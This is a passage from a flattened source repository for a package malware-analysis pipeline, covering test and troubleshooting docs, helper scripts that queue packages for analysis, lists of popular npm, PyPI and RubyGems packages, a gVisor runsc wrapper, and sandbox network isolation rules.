e2e_test_logs_scheduler` to see information on the packages which have been received and proxied onto the analysis workers. 46 | 47 | `make e2e_test_logs_analysis` to see analysis stdout (too much to be useful); better to check minio output as described above. 48 | 49 | ## PubSub (Kafka) Inspection 50 | 51 | Output from the Kafka PubSub topics can be inspected using 52 | [KafkaCat](https://github.com/edenhill/kcat). 53 | 54 | 1. Install `kafkacat` or `kcat` (e.g. `sudo apt install kafkacat`) 55 | 2. Run `kafkacat` to observe the topics: 56 | - package-feeds: `kafkacat -C -J -b localhost:9094 -t package-feeds` 57 | - workers: `kafkacat -C -J -b localhost:9094 -t workers` 58 | - notifications: `kafkacat -C -J -b localhost:9094 -t notifications` 59 | 60 | ## Troubleshooting 61 | 62 | ### Feeds does not start (missing config) 63 | 64 | This can happen if `./config` is not world-readable. You will see the error message `open /config/feeds.yml: permission denied` in the feeds logs. 65 | 66 | To fix simply run: 67 | 68 | ```shell 69 | $ chmod ugo+rx ./config 70 | $ chmod ugo+r ./config/feeds.yml 71 | ``` 72 | 73 | ### Sandbox container is not starting (cgroups v2) 74 | 75 | If the `analysis` logs show failures when trying to start the sandbox container, your machine may need to be configured to use cgroups v2. 76 | 77 | To work with cgroups v2 you will need to: 78 | 79 | 1. add/edit `/etc/docker/daemon.json` and the following: 80 | 81 | ```json 82 | { 83 | "default-cgroupns-mode": "host" 84 | } 85 | ``` 86 | 87 | 2. restart dockerd (if it is running). e.g.: 88 | 89 | ```shell 90 | $ systemctl restart docker.service 91 | ``` 92 | -------------------------------------------------------------------------------- /test/e2e/docker-compose.test.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | analysis: 4 | image: gcr.io/ossf-malware-analysis/analysis:test 5 | environment: 6 | OSSF_SANDBOX_NOPULL: "true" 7 | # for mounting local sandbox images inside container 8 | volumes: 9 | - "/var/lib/containers:/var/lib/containers" 10 | 11 | scheduler: 12 | image: gcr.io/ossf-malware-analysis/scheduler:test 13 | -------------------------------------------------------------------------------- /tools/README.md: -------------------------------------------------------------------------------- 1 | # Package Analysis Tools 2 | 3 | This directory contains scripts and tools. 4 | -------------------------------------------------------------------------------- /tools/analysis/README.md: -------------------------------------------------------------------------------- 1 | # Analysis Tools 2 | 3 | ## Analysis Runner 4 | 5 | The `analysis_runner.py` script is used to inject packages into the PubSub 6 | queue the analysis pipeline consumes work from. 7 | 8 | `node.txt`, `python.txt` and `rubygems.txt` contain a lists of the top packages 9 | from these package repositories (at the time of creation). The data is from 10 | [NPM](https://www.npmjs.com/browse/depended) (* dead), 11 | [PyPI](https://hugovk.github.io/top-pypi-packages/top-pypi-packages-30-days.json) 12 | and [RubyGems](https://rubygems.org/stats). 13 | 14 | ### Prerequisites 15 | 16 | This script requires: 17 | 18 | - Python 3 19 | - [Google Cloud SDK](https://cloud.google.com/sdk/docs/install) 20 | 21 | ### Example usage 22 | 23 | Firstly, ensure you are authenticated with the cloud project: 24 | 25 | ```shell 26 | $ gcloud auth login 27 | ``` 28 | 29 | Here are some possible ways to invoke the script: 30 | 31 | ```shell 32 | $ python3 analysis_runner.py pypi --list python.txt 33 | $ python3 analysis_runner.py npm --list node.txt 34 | $ python3 analysis_runner.py npm --name my-npm-package 35 | $ python3 analysis_runner.py npm --name my-npm-package --version 0.1.1 --file /path/to/local.tgz 36 | ``` 37 | 38 | ### Bulk backfill 39 | 40 | To request a bulk backfill of a list of packages in a particular ecosystem: 41 | 42 | ```shell 43 | $ ./backfill.sh 44 | ``` 45 | -------------------------------------------------------------------------------- /tools/analysis/backfill.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh -x 2 | # Script to bulk request backfills in parallel. 3 | 4 | NUM_WORKERS=128 5 | 6 | if [ $# -lt 2 ]; then 7 | echo "Usage: $0 " 8 | exit 1 9 | fi 10 | 11 | cat $1 | xargs -I {} -P $NUM_WORKERS -n 1 python3 analysis_runner.py -a -n {} $2 12 | -------------------------------------------------------------------------------- /tools/analysis/node.txt: -------------------------------------------------------------------------------- 1 | lodash 2 | react 3 | chalk 4 | tslib 5 | request 6 | commander 7 | express 8 | moment 9 | axios 10 | react-dom 11 | prop-types 12 | fs-extra 13 | debug 14 | vue 15 | uuid 16 | async 17 | bluebird 18 | core-js 19 | classnames 20 | inquirer 21 | yargs 22 | rxjs 23 | webpack 24 | underscore 25 | typescript 26 | glob 27 | mkdirp 28 | dotenv 29 | body-parser 30 | @types/node 31 | @babel/runtime 32 | node-fetch 33 | colors 34 | minimist 35 | jquery 36 | aws-sdk 37 | semver 38 | babel-loader 39 | eslint 40 | babel-runtime 41 | redux 42 | css-loader 43 | winston 44 | rimraf 45 | @babel/core 46 | jsonwebtoken 47 | ora 48 | style-loader 49 | styled-components 50 | babel-core 51 | shelljs 52 | yeoman-generator 53 | react-redux 54 | js-yaml 55 | cheerio 56 | eslint-plugin-import 57 | @angular/core 58 | babel-eslint 59 | through2 60 | ramda 61 | file-loader 62 | vue-router 63 | eslint-plugin-react 64 | @angular/common 65 | node-sass 66 | zone.js 67 | react-router-dom 68 | reflect-metadata 69 | mongoose 70 | q 71 | handlebars 72 | html-webpack-plugin 73 | @angular/platform-browser 74 | url-loader 75 | webpack-dev-server 76 | ws 77 | @angular/compiler 78 | @angular/forms 79 | postcss-loader 80 | request-promise 81 | mongodb 82 | @angular/platform-browser-dynamic 83 | sass-loader 84 | bootstrap 85 | @angular/router 86 | @babel/preset-env 87 | gulp 88 | jest 89 | qs 90 | ejs 91 | babel-polyfill 92 | superagent 93 | object-assign 94 | mocha 95 | path 96 | autoprefixer 97 | graphql 98 | eslint-plugin-jsx-a11y 99 | cors 100 | babel-preset-es2015 101 | socket.io 102 | react-scripts 103 | redis 104 | chai 105 | immutable 106 | prettier 107 | @types/react 108 | xml2js -------------------------------------------------------------------------------- /tools/analysis/python.txt: -------------------------------------------------------------------------------- 1 | urllib3 2 | six 3 | setuptools 4 | botocore 5 | requests 6 | python-dateutil 7 | certifi 8 | pip 9 | idna 10 | s3transfer 11 | chardet 12 | pyyaml 13 | boto3 14 | wheel 15 | rsa 16 | pyasn1 17 | jmespath 18 | numpy 19 | awscli 20 | docutils 21 | cffi 22 | protobuf 23 | pytz 24 | colorama 25 | attrs 26 | pycparser 27 | markupsafe 28 | jinja2 29 | cryptography 30 | pandas 31 | requests-oauthlib 32 | oauthlib 33 | importlib-metadata 34 | google-api-core 35 | click 36 | google-auth 37 | zipp 38 | cachetools 39 | pyparsing 40 | pyasn1-modules 41 | decorator 42 | typing-extensions 43 | packaging 44 | aiohttp 45 | multidict 46 | future 47 | pyjwt 48 | google-cloud-core 49 | googleapis-common-protos 50 | futures 51 | google-api-python-client 52 | jsonschema 53 | uritemplate 54 | yarl 55 | pygments 56 | google-cloud-storage 57 | isodate 58 | pyrsistent 59 | google-auth-httplib2 60 | google-resumable-media 61 | werkzeug 62 | lxml 63 | py 64 | pillow 65 | joblib 66 | grpcio 67 | msrest 68 | scipy 69 | websocket-client 70 | azure-storage-blob 71 | sqlalchemy 72 | pytest 73 | async-timeout 74 | tornado 75 | toml 76 | prometheus-client 77 | azure-core 78 | pyarrow 79 | absl-py 80 | defusedxml 81 | psutil 82 | wrapt 83 | pyopenssl 84 | pexpect 85 | flask 86 | ptyprocess 87 | webencodings 88 | httplib2 89 | prompt-toolkit 90 | pluggy 91 | ipython 92 | itsdangerous 93 | traitlets 94 | entrypoints 95 | scikit-learn 96 | appdirs 97 | ipython-genutils 98 | bleach 99 | azure-common 100 | tqdm 101 | -------------------------------------------------------------------------------- /tools/analysis/rubygems.txt: -------------------------------------------------------------------------------- 1 | activesupport 2 | aws-sdk-core 3 | bundler 4 | diff-lcs 5 | i18n 6 | json 7 | mime-types 8 | minitest 9 | multi_json 10 | nokogiri 11 | rack 12 | rake 13 | rspec 14 | rspec-core 15 | rspec-expectations 16 | rspec-mocks 17 | rspec-support 18 | rubygems-update 19 | thor 20 | tzinfo -------------------------------------------------------------------------------- /tools/gvisor/README.md: -------------------------------------------------------------------------------- 1 | # GVisor Scripts 2 | 3 | ## `runsc_compat.sh` 4 | 5 | This script improves the compatibility of `runsc` when it is used by 6 | [Podman](https://podman.io). 7 | 8 | This project uses [GVisor](https://github.com/google/gvisor)'s OCI runtime 9 | `runsc` to provide a sandbox for analyzing packages. The `runsc` sandbox is used 10 | by setting it as the runtime for Podman running inside a Docker container. 11 | 12 | Unfortunately there are slight differences in the flags passed from Podman 13 | (specifically `conmon`) to the `runsc`. 14 | 15 | In particular, when `podman exec` is called on a running container, the `-d` 16 | (detach) flag is passed by `conmon` to the OCI runtime. However this flag is not 17 | supported by `runsc`. Instead `runsc` supports `-detach`. 18 | 19 | So, to ensure `runsc` works correctly with Podman this script will turn `-d` 20 | into `-detach` when `exec` is called. -------------------------------------------------------------------------------- /tools/gvisor/runsc_compat.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | BIN="/usr/bin/runsc" 4 | 5 | IS_EXEC=0 6 | for arg; do 7 | if [ "$arg" == "exec" ]; then 8 | IS_EXEC=1 9 | fi 10 | done 11 | 12 | 13 | # GVisor's runsc does not support "-d" which is passed to it from conmon. 14 | # runc supports "-d" for running detached so translate the "-d" argument to 15 | # the "-detach" flavor supported by runsc. 16 | if [ $IS_EXEC -eq 1 ]; then 17 | declare -a NEWARGS 18 | for arg; do 19 | if [ "$arg" == "-d" ]; then 20 | NEWARGS+=("-detach") 21 | else 22 | NEWARGS+=("$arg") 23 | fi 24 | done 25 | set -- "${NEWARGS[@]}" 26 | fi 27 | 28 | exec "$BIN" "$@" -------------------------------------------------------------------------------- /tools/network/iptables.rules: -------------------------------------------------------------------------------- 1 | # Create the chain used by podman networking for user-defined rules 2 | # 3 | # Note: the subnet "172.16.16.0/24" used here must match the subnet 4 | # used in podman-analysis.conflist. 5 | *filter 6 | :INPUT ACCEPT [0:0] 7 | :CNI-ADMIN - [0:0] 8 | # Block access to this host from the container network. 9 | -A INPUT -s 172.16.16.0/24 -j DROP 10 | # Block access to metadata.google.internal/AWS metadata. 11 | -A CNI-ADMIN -d 169.254.169.254/32 -j DROP 12 | # Block access to Private address spaces. 13 | -A CNI-ADMIN -s 172.16.16.0/24 -d 10.0.0.0/8 -j DROP 14 | -A CNI-ADMIN -s 172.16.16.0/24 -d 172.16.0.0/12 -j DROP 15 | -A CNI-ADMIN -s 172.16.16.0/24 -d 192.168.0.0/16 -j DROP 16 | COMMIT 17 | -------------------------------------------------------------------------------- /tools/network/podman-analysis.conflist: -------------------------------------------------------------------------------- 1 | { 2 | "cniVersion": "0.4.0", 3 | "name": "analysis-net", 4 | "plugins": [ 5 | { 6 | "type": "bridge", 7 | "bridge": "cni-analysis", 8 | "isGateway": true, 9 | "ipMasq": true, 10 | "hairpinMode": true, 11 | "ipam": { 12 | "type": "host-local", 13 | "subnet": "172.16.16.0/24", 14 | "routes": [ 15 | { "dst": "0.0.0.0/0" } 16 | ] 17 | } 18 | }, 19 | { 20 | "type": "portmap", 21 | "capabilities": { "portMappings": true } 22 | }, 23 | { 24 | "type": "firewall", 25 | "backend": "iptables" 26 | } 27 | ] 28 | } 29 | --------------------------------------------------------------------------------